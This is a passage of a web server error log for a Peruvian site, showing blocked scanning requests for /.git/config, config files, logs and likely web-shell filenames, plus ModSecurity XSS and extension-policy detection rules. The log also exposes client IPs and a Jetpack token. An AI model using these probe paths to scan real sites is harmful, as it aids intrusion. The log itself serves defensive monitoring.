"WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z4q0LeauQuq6cI32dxOU4QAAAMM"] 2025/01/17 16:59:55 [error] 25742#25742: *437176 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/18 00:47:20 [error] 25743#25743: *440776 access forbidden by rule, client: 167.99.181.249, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/18 00:47:21 [error] 25743#25743: *440860 access forbidden by rule, client: 167.99.181.249, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/18 00:47:22 [error] 25742#25742: *440901 access forbidden by rule, client: 139.59.143.102, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/18 00:47:22 [error] 25743#25743: *440917 access forbidden by rule, client: 206.81.24.227, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/18 00:47:25 [error] 25743#25743: *440958 access forbidden by rule, client: 157.230.19.140, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sat Jan 18 00:47:36.188739 2025] [authz_core:error] [pid 26413:tid 139902595303168] [client 134.209.25.199:41748] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sat Jan 18 00:47:36.675569 2025] [authz_core:error] [pid 26413:tid 139902846379776] [client 209.97.180.8:41752] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/18 00:47:41 [error] 25743#25743: *441040 access forbidden by rule, client: 134.209.25.199, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/18 00:47:42 [error] 25743#25743: *441044 access forbidden by rule, client: 209.97.180.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/18 03:10:31 [error] 25743#25743: *442738 access forbidden by rule, client: 185.196.220.16, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sat Jan 18 03:45:28.284524 2025] [authz_core:error] [pid 10896:tid 140071915067136] [client 167.99.182.39:45812] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/18 03:45:31 [error] 10281#10281: *443402 access forbidden by rule, client: 167.99.182.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jan 18 06:29:05.544013 2025] [authz_core:error] [pid 10896:tid 140071915067136] [client 167.71.81.114:47924] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/18 06:29:09 [error] 10281#10281: *444544 access forbidden by rule, client: 167.71.81.114, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/18 10:02:00 [error] 10280#10280: *446564 access forbidden by rule, client: 185.196.220.16, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/18 13:16:42 [error] 10281#10281: *447827 access forbidden by rule, client: 185.196.220.16, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jan 18 16:15:56.155664 2025] [autoindex:error] [pid 10314:tid 140071785174784] [client 98.159.37.244:56164] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Sat Jan 18 16:16:01.787458 2025] [autoindex:error] [pid 10313:tid 140071793567488] [client 98.159.37.244:56176] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Sat Jan 18 16:16:15.962890 2025] [autoindex:error] [pid 10896:tid 140071759996672] [client 98.159.37.244:56208] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Sat Jan 18 16:16:21.279500 2025] [autoindex:error] [pid 10896:tid 140071743211264] [client 98.159.37.244:56220] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jan 18 16:16:22.565944 2025] [autoindex:error] [pid 10313:tid 140071818745600] [client 98.159.37.244:56224] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Sat Jan 18 16:16:35.791531 2025] [autoindex:error] [pid 10313:tid 140071801960192] [client 98.159.37.244:56252] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Sat Jan 18 16:16:36.034472 2025] [:error] [pid 10313:tid 140071743211264] [client 98.159.37.244:56254] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Sat Jan 18 16:16:38.297451 2025] [autoindex:error] [pid 10896:tid 140071801960192] [client 98.159.37.244:56260] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Sat Jan 18 16:16:40.537046 2025] [autoindex:error] [pid 10313:tid 140071684462336] [client 98.159.37.244:56266] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Sat Jan 18 16:16:54.210641 2025] [autoindex:error] [pid 10315:tid 140071793567488] [client 98.159.37.244:56300] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Sat Jan 18 16:17:00.039779 2025] [autoindex:error] [pid 10315:tid 140071701247744] [client 98.159.37.244:56316] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Sat Jan 18 16:17:03.681460 2025] [autoindex:error] [pid 10315:tid 140071915067136] [client 98.159.37.244:56326] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Sat Jan 18 16:17:07.772150 2025] [autoindex:error] [pid 10896:tid 140071768389376] [client 98.159.37.244:56336] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Sat Jan 18 16:17:08.949228 2025] [autoindex:error] [pid 10315:tid 140071827138304] [client 98.159.37.244:56340] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Sat Jan 18 16:17:11.227350 2025] [:error] [pid 10313:tid 140071931852544] [client 98.159.37.244:56346] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Jan 18 16:17:14.276505 2025] [autoindex:error] [pid 10315:tid 140071726425856] [client 98.159.37.244:56354] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Sat Jan 18 16:17:19.219212 2025] [autoindex:error] [pid 10313:tid 140071801960192] [client 98.159.37.244:56366] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Sat Jan 18 16:17:31.181306 2025] [autoindex:error] [pid 10314:tid 140071915067136] [client 98.159.37.244:56396] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Jan 18 16:17:40.502508 2025] [autoindex:error] [pid 10315:tid 140071923459840] [client 98.159.37.244:56416] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Sat Jan 18 16:17:55.507234 2025] [:error] [pid 10313:tid 140071827138304] [client 98.159.37.244:56448] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Jan 18 16:17:56.795646 2025] [autoindex:error] [pid 10314:tid 140071676069632] [client 98.159.37.244:56452] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Sat Jan 18 16:18:15.452735 2025] [:error] [pid 10314:tid 140071709640448] [client 98.159.37.244:56488] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Jan 18 16:18:35.917592 2025] [:error] [pid 10315:tid 140071701247744] [client 98.159.37.244:56524] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Sat Jan 18 16:18:53.779501 2025] [autoindex:error] [pid 10315:tid 140071759996672] [client 98.159.37.244:56560] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Sat Jan 18 16:19:40.500758 2025] [:error] [pid 10896:tid 140071743211264] [client 98.159.37.244:56664] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php 2025/01/19 01:05:02 [error] 10280#10280: *453793 access forbidden by rule, client: 52.63.44.47, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "INVESTIGACIONPERU.COM" 2025/01/19 01:24:35 [error] 10281#10281: *454119 access forbidden by rule, client: 13.211.140.162, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/19 03:55:15 [error] 21069#21069: *455733 access forbidden by rule, client: 13.211.140.162, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sun Jan 19 17:26:04.617183 2025] [autoindex:error] [pid 21106:tid 140477818947328] [client 45.132.115.181:53690] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com 2025/01/20 04:23:08 [error] 30069#30069: *470325 access forbidden by rule, client: 45.148.10.80, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/20 05:38:02 [error] 30069#30069: *470702 access forbidden by rule, client: 179.61.170.109, server: mail.investigacionperu.com, request: "GET /.htaccess HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/20 05:51:37 [error] 30069#30069: *470946 access forbidden by rule, client: 45.148.10.80, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/01/20 06:27:49 [error] 30069#30069: *471152 access forbidden by rule, client: 45.148.10.80, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jan 20 09:24:06.153620 2025] [:error] [pid 30089:tid 139725864126208] [client 192.0.86.82:37000] [client 192.0.86.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:signature. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 7OnSIU= found within ARGS:signature: E77jZJfEmIQWV bTO 3lB7OnSIU="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z45chuMjI-BNwczTyprySQAAABI"], referer: https://investigacionperu.com/?for=jetpack&jetpack=comms&token=Z5nUQajFXxnH%40s%29G4Tnlh9C%5E6NYFP%28XC%3A1%3A0×tamp=1737383045&nonce=vebjHUhkJ9&body-hash=%2B%2BBCriVDKZ4wtom97JPkJc9mBKs%3D&signature=E77jZJfEmIQWV%2BbTO%2B3lB7OnSIU%3D [Mon Jan 20 09:40:41.894343 2025] [:error] [pid 30089:tid 139725948053248] [client 193.41.206.36:37618] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/config.ini"] [unique_id "Z45gaeMjI-BNwczTypryawAAAAg"] [Mon Jan 20 09:41:03.197968 2025] [:error] [pid 30090:tid 139725889304320] [client 193.41.206.36:37624] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/storage/logs/laravel.log"] [unique_id "Z45gf4bEatws-9VT9wmscAAAAE8"] 2025/01/20 15:39:56 [error] 30070#30070: *475306 access forbidden by rule, client: 45.148.10.80, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/20 20:31:10 [error] 30069#30069: *478398 access forbidden by rule, client: 13.201.16.232, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/20 20:34:54 [error] 30070#30070: *478407 access forbidden by rule, client: 13.201.16.232, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/20 23:26:55 [error] 30070#30070: *480218 access forbidden by rule, client: 13.201.16.232, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Tue Jan 21 02:52:49.844724 2025] [:error] [pid 30091:tid 139726039598848] [client 129.213.150.89:52442] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Jan 21 02:53:04.637724 2025] [:error] [pid 8986:tid 139725939660544] [client 129.213.150.89:52484] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Jan 21 02:53:04.650600 2025] [:error] [pid 30090:tid 139725822162688] [client 129.213.150.89:52486] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Jan 21 02:53:39.549469 2025] [autoindex:error] [pid 30090:tid 139726073169664] [client 129.213.150.89:52574] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 21 02:53:47.666116 2025] [:error] [pid 30631:tid 139725880911616] [client 129.213.150.89:52596] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Jan 21 02:53:48.516453 2025] [autoindex:error] [pid 30631:tid 139725939660544] [client 129.213.150.89:52600] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 21 02:53:49.289410 2025] [autoindex:error] [pid 30631:tid 139725948053248] [client 129.213.150.89:52604] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 21 02:53:55.165104 2025] [:error] [pid 8882:tid 139725830555392] [client 129.213.150.89:52622] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Jan 21 02:53:55.178787 2025] [:error] [pid 8882:tid 139726047991552] [client 129.213.150.89:52624] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Jan 21 02:54:44.829696 2025] [:error] [pid 8957:tid 139725897697024] [client 129.213.150.89:52744] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Jan 21 02:54:59.045056 2025] [:error] [pid 30091:tid 139725822162688] [client 129.213.150.89:52782] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Jan 21 02:54:59.058347 2025] [:error] [pid 30090:tid 139725931267840] [client 129.213.150.89:52784] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Jan 21 02:55:37.791683 2025] [autoindex:error] [pid 8957:tid 139725889304320] [client 129.213.150.89:52878] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 21 02:55:45.338049 2025] [:error] [pid 8986:tid 139725897697024] [client 129.213.150.89:52900] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Jan 21 02:55:46.108995 2025] [autoindex:error] [pid 8986:tid 139725889304320] [client 129.213.150.89:52904] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 21 02:55:46.796092 2025] [autoindex:error] [pid 30091:tid 139725956445952] [client 129.213.150.89:52908] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jan 21 02:55:51.416506 2025] [:error] [pid 30089:tid 139726081562368] [client 129.213.150.89:52942] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Jan 21 02:55:51.427124 2025] [:error] [pid 8986:tid 139725922875136] [client 129.213.150.89:52944] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Jan 21 11:35:25.762081 2025] [:error] [pid 19899:tid 139991833306880] [client 13.37.230.216:34842] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/github.php [Tue Jan 21 11:35:35.409671 2025] [:error] [pid 19899:tid 139991866877696] [client 13.37.230.216:34844] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/github.php [Tue Jan 21 16:25:30.604912 2025] [autoindex:error] [pid 19286:tid 139991959197440] [client 74.225.134.186:39014] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2025/01/21 22:14:55 [error] 19247#19247: *490987 access forbidden by rule, client: 52.63.44.47, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Jan 22 00:53:58.988213 2025] [:error] [pid 19899:tid 139991824914176] [client 150.136.69.140:45954] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Jan 22 00:54:11.874536 2025] [:error] [pid 19286:tid 139991850092288] [client 150.136.69.140:45986] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jan 22 00:54:11.895401 2025] [:error] [pid 19286:tid 139991883663104] [client 150.136.69.140:45988] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jan 22 00:54:46.760541 2025] [autoindex:error] [pid 19899:tid 139991959197440] [client 150.136.69.140:46086] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 22 00:54:54.899398 2025] [:error] [pid 19899:tid 139991925626624] [client 150.136.69.140:46112] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jan 22 00:54:55.556984 2025] [autoindex:error] [pid 19286:tid 139992067348224] [client 150.136.69.140:46116] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed 